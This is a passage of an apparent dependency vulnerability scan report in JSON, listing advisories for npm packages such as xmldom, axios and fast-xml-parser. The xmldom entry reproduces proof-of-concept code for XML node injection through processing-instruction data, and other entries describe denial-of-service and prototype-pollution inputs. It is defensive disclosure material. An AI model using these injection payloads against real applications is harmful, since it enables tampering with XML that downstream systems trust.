InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h" + ] + }, + { + "VulnerabilityID": "CVE-2026-41675", + "VendorIDs": [ + "GHSA-x6wf-f3px-wcqx" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "f9e98e014475aea3" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.13, 0.9.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41675", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:77caf4d99528b5130227d79088c1d056861b199c81777e384d644cf02d8d558f", + "Title": "xmldom has XML node injection through unvalidated processing instruction serialization", + "Description": "## Summary\n\nThe package allows attacker-controlled processing instruction data to be serialized into XML without validating or neutralizing the PI-closing sequence `?\u003e`. As a result, an attacker can terminate the processing instruction early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for processing instruction nodes.\n\nWhen `createProcessingInstruction(target, data)` is called, the supplied `data` string is stored directly on the node without validation. Later, when the document is serialized, the serializer writes PI nodes by concatenating `\u003c?`, the target, a space, `node.data`, and `?\u003e` directly.\n\nThat behavior is unsafe because processing instructions are a syntax-sensitive context. The closing delimiter `?\u003e` terminates the PI. If attacker-controlled input contains `?\u003e`, the serializer does not preserve it as literal PI content. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThe same class of vulnerability was previously addressed for CDATA sections (GHSA-wh4c-j3r5-mjhp / CVE-2026-34601), where `]]\u003e` in CDATA data was handled by splitting. The serializer applies no equivalent protection to processing instruction data.\n\n---\n\n## Affected code\n\n**`lib/dom.js` — `createProcessingInstruction` (lines 2240–2246):**\n\n```js\ncreateProcessingInstruction: function (target, data) {\n var node = new ProcessingInstruction(PDC);\n node.ownerDocument = this;\n node.childNodes = new NodeList();\n node.nodeName = node.target = target;\n node.nodeValue = node.data = data;\n return node;\n},\n```\n\nNo validation is performed on `data`. Any string including `?\u003e` is stored as-is.\n\n**`lib/dom.js` — serializer PI case (line 2966):**\n\n```js\ncase PROCESSING_INSTRUCTION_NODE:\n return buf.push('\u003c?', node.target, ' ', node.data, '?\u003e');\n```\n\n`node.data` is emitted verbatim. If it contains `?\u003e`, that sequence terminates the PI in the output\nstream and the remainder appears as active XML markup.\n\n**Contrast — CDATA (line 2945, patched):**\n\n```js\ncase CDATA_SECTION_NODE:\n return buf.push(g.CDATA_START, node.data.replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e'), g.CDATA_END);\n```\n\n---\n\n## PoC\n\n### Minimal (from @tlsbollei report, 2026-04-01)\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(\n doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q ')\n);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n// ^^^^ injected \u003cz/\u003e element is active markup\n```\n\n### With re-parse verification (from @tlsbollei report)\n\n```js\nconst assert = require('assert');\nconst { DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMParser().parseFromString('\u003cr/\u003e', 'application/xml');\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\nconst xml = new XMLSerializer().serializeToString(doc);\nassert.strictEqual(new DOMParser().parseFromString(xml, 'application/xml')\n .getElementsByTagName('z').length, 1); // passes — z is a real element\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended PI boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\nAs noted by @tlsbollei: this is the same delimiter-driven XML injection bug class previously addressed by GHSA-wh4c-j3r5-mjhp for `createCDATASection()`. Fixing CDATA while leaving PI creation and PI serialization unguarded leaves the same standards-constrained issue open for another node type.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via\n[xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed\nwithout being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createProcessingInstruction()` or mutate PI nodes with untrusted input\n\u003e (via `.data =` or `CharacterData` mutation methods) should audit all `serializeToString()`\n\u003e call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting any ProcessingInstruction node whose `.data` contains `?\u003e`. This check applies regardless of how `?\u003e` entered the node — whether via `createProcessingInstruction` directly or a subsequent mutation (`.data =`, `CharacterData` methods).\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the serializer additionally applies the full W3C DOM Parsing §3.2.1.7 checks when `requireWellFormed: true`:\n\n1. **Target check**: throws `InvalidStateError` if the PI target contains a `:` character or is an ASCII case-insensitive match for `\"xml\"`.\n2. **Data Char check**: throws `InvalidStateError` if the PI data contains characters outside the XML Char production.\n3. **Data sequence check**: throws `InvalidStateError` if the PI data contains `?\u003e`.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `?\u003e` data check (check 3) is applied. The target and XML Char checks are not included in the LTS fix.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'r', null);\ndoc.documentElement.appendChild(doc.createProcessingInstruction('a', '?\u003e\u003cz/\u003e\u003c?q '));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003cr\u003e\u003c?a ?\u003e\u003cz/\u003e\u003c?q ?\u003e\u003c/r\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n}\n```\n\nThe guard catches `?\u003e` regardless of when it was introduced:\n\n```js\n// Post-creation mutation: also caught at serialization time\nconst pi = doc.createProcessingInstruction('target', 'safe data');\ndoc.documentElement.appendChild(pi);\npi.data = 'safe?\u003e\u003cinjected/\u003e';\nnew XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n// InvalidStateError: The ProcessingInstruction data contains \"?\u003e\"\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing PI data verbatim. This matches browser behavior: Chrome, Firefox, and Safari all emit `?\u003e` in PI data verbatim by default without error.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing code.\n\n### Residual limitation\n\n`createProcessingInstruction(target, data)` does not validate `data` at creation time. The WHATWG DOM spec (§4.5 step 2) mandates an `InvalidCharacterError` when `data` contains `?\u003e`; enforcing this check unconditionally at creation time is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), PI data containing `?\u003e` is still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", + "V40Score": 8.7 + } + }, + "References": [ + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2", + "https://github.com/xmldom/xmldom/releases/tag/0.8.13", + "https://github.com/xmldom/xmldom/releases/tag/0.9.10", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx" + ] + }, + { + "VulnerabilityID": "CVE-2026-25639", + "VendorIDs": [ + "GHSA-43fc-jf86-j433" + ], + "PkgID": "axios@1.12.2", + "PkgName": "axios", + "PkgIdentifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "42b431016ae1856f" + }, + "InstalledVersion": "1.12.2", + "FixedVersion": "1.13.5, 0.30.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25639", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d9d4c72adba41965ddc803d8068bcf0c61cfdc93361d9496ffb1b9112537b3b3", + "Title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig", + "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-754" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-25639", + "https://github.com/axios/axios", + "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57", + "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e", + "https://github.com/axios/axios/pull/7369", + "https://github.com/axios/axios/pull/7388", + "https://github.com/axios/axios/releases/tag/v0.30.3", + "https://github.com/axios/axios/releases/tag/v1.13.5", + "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433", + "https://nvd.nist.gov/vuln/detail/CVE-2026-25639", + "https://www.cve.org/CVERecord?id=CVE-2026-25639" + ], + "PublishedDate": "2026-02-09T21:15:49.01Z", + "LastModifiedDate": "2026-02-18T18:24:34.12Z" + }, + { + "VulnerabilityID": "CVE-2025-62718", + "VendorIDs": [ + "GHSA-3p68-rc4w-qgx5" + ], + "PkgID": "axios@1.12.2", + "PkgName": "axios", + "PkgIdentifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "42b431016ae1856f" + }, + "InstalledVersion": "1.12.2", + "FixedVersion": "1.15.0, 0.31.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-62718", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:49279be910a1264a8503df1e4001529f87c2262c2d30d14a9fec2b191e3e8f98", + "Title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization", + "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-441", + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 4, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N", + "V3Score": 4.8, + "V40Score": 6.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L", + "V3Score": 9.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", + "V3Score": 7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-62718", + "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1", + "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2", + "https://github.com/axios/axios", + "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", + "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df", + "https://github.com/axios/axios/pull/10661", + "https://github.com/axios/axios/pull/10688", + "https://github.com/axios/axios/releases/tag/v0.31.0", + "https://github.com/axios/axios/releases/tag/v1.15.0", + "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5", + "https://nvd.nist.gov/vuln/detail/CVE-2025-62718", + "https://www.cve.org/CVERecord?id=CVE-2025-62718" + ], + "PublishedDate": "2026-04-09T15:16:08.65Z", + "LastModifiedDate": "2026-04-16T19:16:33.063Z" + }, + { + "VulnerabilityID": "CVE-2026-40175", + "VendorIDs": [ + "GHSA-fvcv-3m26-pcqx" + ], + "PkgID": "axios@1.12.2", + "PkgName": "axios", + "PkgIdentifier": { + "PURL": "pkg:npm/axios@1.12.2", + "UID": "42b431016ae1856f" + }, + "InstalledVersion": "1.12.2", + "FixedVersion": "1.15.0, 0.31.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-40175", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b0bfd5805d9e52213affbe105be2c80a683640a31e880f8e68cbb9fbbef07a87", + "Title": "axios: Axios: Remote Code Execution via Prototype Pollution escalation", + "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-113", + "CWE-444", + "CWE-918" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 4.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", + "V3Score": 4.8 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "V3Score": 9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-40175", + "https://github.com/axios/axios", + "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", + "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1", + "https://github.com/axios/axios/pull/10660", + "https://github.com/axios/axios/pull/10660#issuecomment-4224168081", + "https://github.com/axios/axios/pull/10688", + "https://github.com/axios/axios/releases/tag/v0.31.0", + "https://github.com/axios/axios/releases/tag/v1.15.0", + "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-40175", + "https://www.cve.org/CVERecord?id=CVE-2026-40175" + ], + "PublishedDate": "2026-04-10T20:16:22.8Z", + "LastModifiedDate": "2026-04-21T19:44:44.4Z" + }, + { + "VulnerabilityID": "CVE-2026-33750", + "VendorIDs": [ + "GHSA-f886-m6hf-6m8v" + ], + "PkgID": "brace-expansion@1.1.12", + "PkgName": "brace-expansion", + "PkgIdentifier": { + "PURL": "pkg:npm/brace-expansion@1.1.12", + "UID": "84bc3c1c5bf9dc3f" + }, + "InstalledVersion": "1.1.12", + "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:eda4b5bf3c46e5b4ee443a14af1ff5ecf8f7467d9a87ad1735377e27aa4dd063", + "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", + "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33750", + "https://github.com/juliangruber/brace-expansion", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", + "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", + "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", + "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", + "https://github.com/juliangruber/brace-expansion/issues/98", + "https://github.com/juliangruber/brace-expansion/pull/95", + "https://github.com/juliangruber/brace-expansion/pull/96", + "https://github.com/juliangruber/brace-expansion/pull/97", + "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", + "https://www.cve.org/CVERecord?id=CVE-2026-33750" + ], + "PublishedDate": "2026-03-27T15:16:57.297Z", + "LastModifiedDate": "2026-04-22T14:23:19.11Z" + }, + { + "VulnerabilityID": "CVE-2026-33750", + "VendorIDs": [ + "GHSA-f886-m6hf-6m8v" + ], + "PkgID": "brace-expansion@2.0.2", + "PkgName": "brace-expansion", + "PkgIdentifier": { + "PURL": "pkg:npm/brace-expansion@2.0.2", + "UID": "17232eb9182a44a1" + }, + "InstalledVersion": "2.0.2", + "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4f40f60ea3f0cf4a04f39bdb10f5949a146ab526a5636952f92642cfea086fb8", + "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", + "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33750", + "https://github.com/juliangruber/brace-expansion", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", + "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", + "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", + "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", + "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", + "https://github.com/juliangruber/brace-expansion/issues/98", + "https://github.com/juliangruber/brace-expansion/pull/95", + "https://github.com/juliangruber/brace-expansion/pull/96", + "https://github.com/juliangruber/brace-expansion/pull/97", + "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", + "https://www.cve.org/CVERecord?id=CVE-2026-33750" + ], + "PublishedDate": "2026-03-27T15:16:57.297Z", + "LastModifiedDate": "2026-04-22T14:23:19.11Z" + }, + { + "VulnerabilityID": "CVE-2026-24001", + "VendorIDs": [ + "GHSA-73rr-hh4g-fpgx" + ], + "PkgID": "diff@8.0.2", + "PkgName": "diff", + "PkgIdentifier": { + "PURL": "pkg:npm/diff@8.0.2", + "UID": "cb8731532713510" + }, + "InstalledVersion": "8.0.2", + "FixedVersion": "8.0.3, 5.2.2, 4.0.4, 3.5.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24001", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1a2ef3a8105748e688b1b7728779c40234ca0ddc5f8ff725693446ca216c6d3a", + "Title": "jsdiff: denial of service vulnerability in parsePatch and applyPatch", + "Description": "jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch whose filename headers contain the line break characters `\\r`, `\\u2028`, or `\\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its \"leading garbage\"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\\r`, `\\u2028`, or `\\u2029`.", + "Severity": "LOW", + "CweIDs": [ + "CWE-400", + "CWE-1333" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", + "V40Score": 2.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-24001", + "https://github.com/kpdecker/jsdiff", + "https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5", + "https://github.com/kpdecker/jsdiff/issues/653", + "https://github.com/kpdecker/jsdiff/pull/649", + "https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24001", + "https://www.cve.org/CVERecord?id=CVE-2026-24001" + ], + "PublishedDate": "2026-01-22T03:15:47.627Z", + "LastModifiedDate": "2026-03-04T15:23:41.347Z" + }, + { + "VulnerabilityID": "CVE-2026-25896", + "VendorIDs": [ + "GHSA-m7jm-9gc2-mpf2" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.3.5, 4.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25896", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1f66714c4aba4c8a808f88b2d38bf16da0ed67a0b770ab61842c0fe16ccd64ba", + "Title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling", + "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (\u0026lt;, \u0026gt;, \u0026amp;, \u0026quot;, \u0026apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-185" + ], + "VendorSeverity": { + "ghsa": 4, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", + "V3Score": 9.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-25896", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69", + 